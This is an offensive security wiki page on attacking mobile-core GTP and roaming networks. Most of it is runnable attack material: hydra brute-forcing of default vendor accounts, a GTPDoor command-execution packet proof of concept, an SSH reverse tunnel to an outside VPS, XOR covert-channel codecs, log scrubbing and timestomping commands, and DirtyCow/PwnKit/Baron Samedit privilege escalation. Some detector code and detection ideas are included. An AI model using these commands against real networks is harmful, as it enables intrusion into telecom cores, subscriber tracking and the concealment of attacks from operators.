
# Telecom Network Exploitation (GTP / Roaming Environments)

{{#include ../../banners/hacktricks-training.md}}

> [!NOTE]
> Mobile core protocols (GPRS Tunnelling Protocol, GTP) often traverse the semi-trusted GRX/IPX roaming backbones. Because they run over plain UDP with almost no authentication, any foothold inside a telecom perimeter can usually reach the core signalling planes directly. The following notes collect offensive techniques observed in real environments against SGSN/GGSN, PGW/SGW and other EPC nodes.

## 1. Recon & Initial Access

### 1.1 Default OSS / NE Accounts

A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … A dedicated wordlist dramatically improves brute-force success:

```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```

If the device only exposes a management VRF, pivot through a jump host first (see section 4.1, sgsnemu + SOCKS5, below).

### 1.2 Host Discovery inside GRX/IPX

Most GRX operators still allow ICMP echo across the backbone. Combine masscan with a gtpv1 UDP probe on port 2123 to quickly map GTP-C listeners:

```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```

## 2. Enumerating Subscribers: cordscan

This Go tool crafts GTP-C Create PDP Context Request packets and logs the responses. Each reply reveals the SGSN / MME currently serving the queried IMSI and, sometimes, the PLMN the subscriber is visiting.

```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```

Key flags:

- `--imsi` Target subscriber IMSI
- `--oper` Home operator / HNI (MCC+MNC)
- `-w` Write raw packets to a pcap file

Important constants inside the binary can be patched to widen the scan:

```go
pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"
```

## 3. Code Execution over GTP: GTPDoor

GTPDoor is a small ELF service that binds UDP 2123 and parses every incoming GTP-C packet. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via `/bin/sh -c`. stdout/stderr are shipped back inside Echo Response messages, so no outbound session is ever created.

Minimal PoC packet (Python):

```python
# PoC as described above. `gtpc` is a helper the page assumes (it wraps the tag + blob
# into the Private Extension IE of a GTP-C Echo Request); AES comes from PyCryptodome.
import gtpc
from Crypto.Cipher import AES

key = b"SixteenByteKey!!"                      # AES-128 needs exactly 16 bytes (the original had 15)
cmd = b"id;uname -a"
# static all-zero IV; the command is zero-padded to a multiple of the 16-byte block size
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).encrypt(cmd.ljust(32, b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```

Detection:

- any host sending unbalanced Echo Requests (many requests, few or no matching responses) to SGSN IPs
- Echo Requests (message type 1, GTP version 1) that carry a payload, i.e. a Private Extension IE holding the blob, instead of the bare header a keepalive consists of; this is not how the spec uses Echo
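The following block is an added example and is not cordscan or GTPDoor code. It is a minimal GTPv1-C codec (header, TV/TLV information elements, TBCD-encoded IMSI) used for two things from the sections above: building the kind of Create PDP Context Request that cordscan sends (section 2), and implementing the two GTPDoor detection bullets (section 3) over constructed traffic. The IE subset of the Create PDP Context Request, the `EchoWatch` class and all packets and addresses are assumptions made here for the example; the message is enough for a lab, not a complete 3GPP TS 29.060 message.

```python
"""Added example, not cordscan or GTPDoor code: minimal GTPv1-C codec plus the
GTPDoor detection logic described in section 3. Everything is constructed inline."""
import struct
from collections import defaultdict
from typing import Optional

ECHO_REQ, ECHO_RSP, CREATE_PDP_REQ = 1, 2, 16          # GTPv1-C message types
IE_IMSI, IE_RECOVERY, IE_SELMODE, IE_TEID_DATA, IE_TEID_CP, IE_NSAPI = 2, 14, 15, 16, 17, 20
IE_APN, IE_PRIVATE_EXT = 0x83, 0xFF                    # TLV IEs (type >= 0x80 carries a 2-byte length)
TV_LEN = {1: 1, 2: 8, 14: 1, 15: 1, 16: 4, 17: 4, 20: 1}  # fixed sizes of the TV IEs used here


def encode_imsi(imsi: str) -> bytes:
    """TBCD: nibble-swapped digit pairs, padded with 0xF to 8 bytes (TS 29.060 7.7.2)."""
    d = imsi + "F" * (16 - len(imsi))
    return bytes(int(d[i + 1], 16) << 4 | int(d[i], 16) for i in range(0, 16, 2))


def decode_imsi(b: bytes) -> str:
    return "".join(f"{x & 0xF:x}{x >> 4:x}" for x in b).upper().rstrip("F")


def build_gtpv1(msg_type: int, teid: int, payload: bytes = b"", seq: Optional[int] = None) -> bytes:
    flags, opt = 0x30, b""                              # version 1, PT=1 (GTP), no E/S/PN bits
    if seq is not None:
        flags |= 0x02                                   # S bit: 2-byte seq + N-PDU + next-ext octets
        opt = struct.pack(">HBB", seq, 0, 0)
    body = opt + payload
    return struct.pack(">BBHI", flags, msg_type, len(body), teid) + body   # length counts from octet 9


def parse_ies(body: bytes) -> list:
    ies, i = [], 0
    while i < len(body):
        t = body[i]
        if t & 0x80:                                    # TLV: big-endian 2-byte length
            ln = struct.unpack(">H", body[i + 1:i + 3])[0]
            ies.append((t, body[i + 3:i + 3 + ln])); i += 3 + ln
        else:                                           # TV: length implied by the type
            ln = TV_LEN[t]
            ies.append((t, body[i + 1:i + 1 + ln])); i += 1 + ln
    return ies


def parse_gtpv1(pkt: bytes) -> dict:
    flags, msg_type, length, teid = struct.unpack(">BBHI", pkt[:8])
    if flags >> 5 != 1:
        raise ValueError("not a GTPv1 packet")
    body, seq = pkt[8:8 + length], None
    if flags & 0x07:                                    # any of E/S/PN set => 4 optional octets follow
        if flags & 0x02:
            seq = struct.unpack(">H", body[:2])[0]
        body = body[4:]
    return {"type": msg_type, "teid": teid, "seq": seq, "ies": parse_ies(body)}


def tlv(t: int, v: bytes) -> bytes:
    return bytes([t]) + struct.pack(">H", len(v)) + v


def build_create_pdp_req(imsi: str, apn: str, seq: int) -> bytes:
    """Subset of the mandatory IEs of a Create PDP Context Request (TS 29.060 7.3.1); assumed subset."""
    apn_ie = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in apn.split("."))   # DNS-style labels
    payload = (bytes([IE_IMSI]) + encode_imsi(imsi)
               + bytes([IE_RECOVERY, 0])
               + bytes([IE_SELMODE, 0xFC])              # MS or network provided APN, subscription verified
               + bytes([IE_TEID_DATA]) + b"\x00\x00\x00\x01"
               + bytes([IE_TEID_CP]) + b"\x00\x00\x00\x01"
               + bytes([IE_NSAPI, 5])
               + tlv(IE_APN, apn_ie))
    return build_gtpv1(CREATE_PDP_REQ, 0, payload, seq)   # TEID 0: no context exists yet


class EchoWatch:
    """The two detection bullets: Echo Requests carrying a Private Extension IE (a keepalive
    is a bare header) and sources whose Echo Requests stay unanswered."""
    def __init__(self):
        self.req, self.rsp, self.alerts = defaultdict(int), defaultdict(int), []

    def feed(self, src: str, dst: str, pkt: bytes) -> None:
        p = parse_gtpv1(pkt)
        if p["type"] == ECHO_REQ:
            self.req[src] += 1
            if any(t == IE_PRIVATE_EXT for t, _ in p["ies"]):
                self.alerts.append(f"{src}->{dst} Echo Request with Private Extension IE (seq={p['seq']})")
        elif p["type"] == ECHO_RSP:
            self.rsp[dst] += 1                          # the response flows back to the requester

    def unbalanced(self, threshold: int = 3) -> dict:
        return {s: (self.req[s], self.rsp[s]) for s in self.req if self.req[s] - self.rsp[s] >= threshold}


def demo() -> EchoWatch:
    """Constructed traffic: one legitimate keepalive pair and four GTPDoor-style beacons."""
    w = EchoWatch()
    w.feed("10.1.1.10", "10.1.1.100", build_gtpv1(ECHO_REQ, 0, seq=1))                   # 12-byte keepalive
    w.feed("10.1.1.100", "10.1.1.10", build_gtpv1(ECHO_RSP, 0, bytes([IE_RECOVERY, 0]), seq=1))
    blob = b"MAG1C" + bytes(32)   # constructed: pre-shared tag + 32-byte ciphertext placeholder
    for i in range(4):
        w.feed("10.9.9.9", "10.1.1.100", build_gtpv1(ECHO_REQ, 0, tlv(IE_PRIVATE_EXT, blob), seq=i))
    return w


if __name__ == "__main__":
    print(build_create_pdp_req("404995112345678", "internet", 7).hex())
    w = demo()
    print(*w.alerts, w.unbalanced(), sep="\n")
```

The detector keys only on structure (a Private Extension IE inside an Echo Request, and a request/response imbalance per source), so it does not need the tag or the key; a legitimate keepalive is 12 bytes and the only IE an Echo Response legitimately carries is Recovery.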

## 4. Pivoting Through the Core

### 4.1 sgsnemu + SOCKS5

OsmoGGSN ships an SGSN emulator (`sgsnemu`) able to establish a PDP context towards a real GGSN/PGW. Once the context is negotiated, the Linux host gets a new `tun0` interface that is reachable from the roaming peer.

```bash
# OsmoGGSN sgsnemu long options (verify against `sgsnemu --help` on your build):
#   --listen  local GTP address   --remote  target GGSN/PGW   --createif  create the tun device
sgsnemu --listen 10.1.1.10 --remote 10.1.1.100 --imsi 404995112345678 \
        --apn internet --contexts 1 --createif --debug
ip route add 172.16.0.0/12 dev tun0   # send the target ranges through the PDP tunnel
microsocks -p 1080 &                  # internal SOCKS5 proxy for the next hop
```

With suitable firewall hair-pinning, this tunnel bypasses the signalling-only VLANs and drops you straight into the data plane.

### 4.2 SSH Reverse Tunnel over Port 53

DNS is almost always open in roaming infrastructure. Expose the internal SSH service to your VPS listening on :53 and come back later from home:

```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```

Check that `GatewayPorts yes` is set in the VPS's `sshd_config`; without it the `-R` listener binds to loopback only and is not reachable from outside.

## 5. Covert Channels

| Channel | Transport | Decoding | Notes |
|---|---|---|---|
| ICMP: EchoBackdoor | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | purely passive listener, no outbound traffic |
| DNS: NoDepDNS | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | watches the `*.nodep` sub-domain |
| GTP: GTPDoor | UDP 2123 | AES-128-CBC blob in Private Extension IE | blends in with legitimate GTP-C chatter |
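The block below is an added example, not the implants' own code: encode/decode helpers for the two XOR channels in the table, the kind of thing an analyst writes to turn captured A-record octets or ICMP echo payloads back into the operator's commands. The table states only the key, the carrier and the chunk layout; NUL padding of the last chunk, cyclic key repetition and the placement of the 4-byte ICMP key at the start of every payload are assumptions made here.

```python
"""Added example, not EchoBackdoor/NoDepDNS code: codecs for the two XOR covert
channels from the table. Padding and key placement are assumed framings."""
DNS_KEY = b"funnyAndHappy"        # key named in the table
ICMP_CHUNK = 14                   # per the table: 4-byte key + 14-byte chunk per Echo packet


def xor(data: bytes, key: bytes) -> bytes:
    """Cyclic XOR (assumed: the key repeats across the whole stream)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def _pad(msg: bytes, n: int) -> bytes:
    return msg + b"\0" * (-len(msg) % n)          # assumed NUL padding, stripped again on decode


def dns_encode(msg: bytes, key: bytes = DNS_KEY) -> list:
    """Plaintext -> one dotted quad per A record (4 ciphertext bytes each)."""
    enc = xor(_pad(msg, 4), key)
    return [".".join(str(b) for b in enc[i:i + 4]) for i in range(0, len(enc), 4)]


def dns_decode(quads: list, key: bytes = DNS_KEY) -> bytes:
    """A-record octets (in answer order) -> plaintext."""
    raw = b"".join(bytes(int(o) for o in q.split(".")) for q in quads)
    return xor(raw, key).rstrip(b"\0")


def icmp_encode(msg: bytes, key: bytes) -> list:
    """Plaintext -> Echo payloads, each = 4-byte key followed by a 14-byte XORed chunk."""
    if len(key) != 4:
        raise ValueError("EchoBackdoor key is 4 bytes")
    p = _pad(msg, ICMP_CHUNK)
    return [key + xor(p[i:i + ICMP_CHUNK], key) for i in range(0, len(p), ICMP_CHUNK)]


def icmp_decode(payloads: list) -> bytes:
    """Echo payloads -> plaintext; the key is read from each packet's first 4 bytes."""
    out = b"".join(xor(pl[4:], pl[:4]) for pl in payloads)
    return out.rstrip(b"\0")


def is_nodep_query(qname: str) -> bool:
    """NoDepDNS only reacts to names under *.nodep: a cheap first filter on resolver logs."""
    return qname.lower().rstrip(".").endswith(".nodep")


if __name__ == "__main__":
    cmd = b"id;uname -a"                              # constructed sample command
    print(dns_encode(cmd), dns_decode(dns_encode(cmd)))
    print(icmp_decode(icmp_encode(cmd, b"\xde\xad\xbe\xef")))
```

Because both channels are plain XOR with a fixed key, a single captured command/response pair is usually enough to confirm the key by XORing ciphertext against an expected plaintext such as `uid=0(root)`.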

All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.

## 6. Defense Evasion Cheatsheet

```bash
# Remove attacker IPs from wtmp (dump to text, drop the matching lines, re-encode to binary)
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history for this shell
export HISTFILE=/dev/null

# Masquerade as a kernel thread: writing to /proc/<pid>/comm renames the task, so
# ps/top show "kworker/1:0" instead of the real name (it does not hide the process)
printf 'kworker/1:0' > /proc/$$/comm

touch -r /usr/bin/time /usr/bin/chargen   # timestomp: copy atime/mtime from a reference file
setenforce 0                              # switch SELinux to permissive (needs root)
```
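The following is an added example, not code from the page: it works on the raw `wtmp` records instead of going through `utmpdump`, so you can see what the `sed` step above actually removes and what it leaves behind for a forensic examiner. It assumes glibc's 384-byte `struct utmp` layout on x86_64 and the usual sshd behaviour of writing the logout (`DEAD_PROCESS`) record with an empty host field; the sample records are constructed here.

```python
"""Added example, not from the page: parse raw wtmp records, reproduce the scrub
the cheatsheet performs, and show the orphaned logout record it leaves behind.
Layout: glibc struct utmp on x86_64, 384 bytes (assumed)."""
import struct

UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"   # type,pad,pid,line,id,user,host,exit(2),session,tv(2),addr_v6,unused
UTMP_SIZE = struct.calcsize(UTMP_FMT)       # 384
USER_PROCESS, DEAD_PROCESS = 7, 8


def pack_record(ut_type: int, pid: int, line: str, user: str, host: str, ts: int) -> bytes:
    """Build one wtmp record (used here only to construct sample input)."""
    c = lambda s, n: s.encode().ljust(n, b"\0")
    return struct.pack(UTMP_FMT, ut_type, pid, c(line, 32), c("ts/0", 4), c(user, 32), c(host, 256),
                       0, 0, 0, ts, 0, 0, 0, 0, 0)


def parse_wtmp(blob: bytes) -> list:
    recs = []
    for off in range(0, len(blob) - len(blob) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack(UTMP_FMT, blob[off:off + UTMP_SIZE])
        s = lambda b: b.split(b"\0", 1)[0].decode(errors="replace")
        recs.append({"type": f[0], "pid": f[1], "line": s(f[2]), "user": s(f[4]), "host": s(f[5]), "time": f[9]})
    return recs


def scrub_host(blob: bytes, host: str) -> bytes:
    """Same effect as `utmpdump | sed '/host/d' | utmpdump -r`: drop every record naming host."""
    chunks = [blob[o:o + UTMP_SIZE] for o in range(0, len(blob), UTMP_SIZE)]
    return b"".join(ch for ch in chunks if parse_wtmp(ch)[0]["host"] != host)


def orphan_logouts(recs: list) -> list:
    """Defender check: DEAD_PROCESS records whose tty has no preceding open USER_PROCESS.
    sshd writes the logout record with an empty host, so an IP-based scrub removes the
    login but not the logout and leaves exactly this kind of orphan."""
    open_lines, orphans = set(), []
    for r in recs:
        if r["type"] == USER_PROCESS:
            open_lines.add(r["line"])
        elif r["type"] == DEAD_PROCESS:
            if r["line"] in open_lines:
                open_lines.discard(r["line"])
            else:
                orphans.append(r)
    return orphans


def demo():
    """Constructed wtmp: an admin session and an attacker session from 203.0.113.66."""
    t = 1_700_000_000
    sample = b"".join([
        pack_record(USER_PROCESS, 4242, "pts/0", "admin", "10.1.1.10", t),
        pack_record(DEAD_PROCESS, 4242, "pts/0", "", "", t + 600),
        pack_record(USER_PROCESS, 5151, "pts/1", "root", "203.0.113.66", t + 900),
        pack_record(DEAD_PROCESS, 5151, "pts/1", "", "", t + 1800),
    ])
    return sample, scrub_host(sample, "203.0.113.66")


if __name__ == "__main__":
    sample, cleaned = demo()
    print(len(parse_wtmp(sample)), "records before,", len(parse_wtmp(cleaned)), "after")
    print("orphaned logouts after scrub:", orphan_logouts(parse_wtmp(cleaned)))
```

On a real box, baseline the orphan count against reboots first: init also writes `DEAD_PROCESS` records for getty lines at shutdown, so only orphans on `pts/*` lines between boots are worth chasing, and they should be cross-checked against `btmp`, `lastlog` and sshd's syslog entries, which the `sed` step does not touch.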

## 7. Privilege Escalation on Legacy NEs

```bash
# DirtyCow  CVE-2016-5195 (FireFart's dirty.c: adds user "firefart" with the given
# password and backs up the original /etc/passwd to /tmp/passwd.bak)
gcc -pthread dirty.c -o dirty -lcrypt && ./dirty newpassword

# PwnKit  CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit  CVE-2021-3156
python3 exploit_userspec.py
```

Cleanup:

```bash
mv /tmp/passwd.bak /etc/passwd 2>/dev/null   # restore the pre-DirtyCow /etc/passwd
userdel firefart 2>/dev/null                 # fallback if the backup is gone
rm -f /tmp/sh ; history -c
```

## 8. Tool Box

- `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS`: the custom tools described in the sections above.
- FScan: intranet TCP scanning (`fscan -h 10.0.0.0/24 -p 22,80,443`)
- Responder: LLMNR/NBT-NS poisoning and rogue WPAD
- Microsocks + ProxyChains: lightweight SOCKS5 pivoting
- FRP (≥0.37): NAT traversal / asset bridging

## Detection Ideas

1. Any device other than an SGSN/GGSN building Create PDP Context Requests.
2. Non-standard ports (53, 80, 443) receiving SSH handshakes from internal IPs.
3. Frequent Echo Requests without matching Echo Responses, which can indicate GTPDoor beacons.
4. A high rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields.


{{#include ../../banners/hacktricks-training.md}}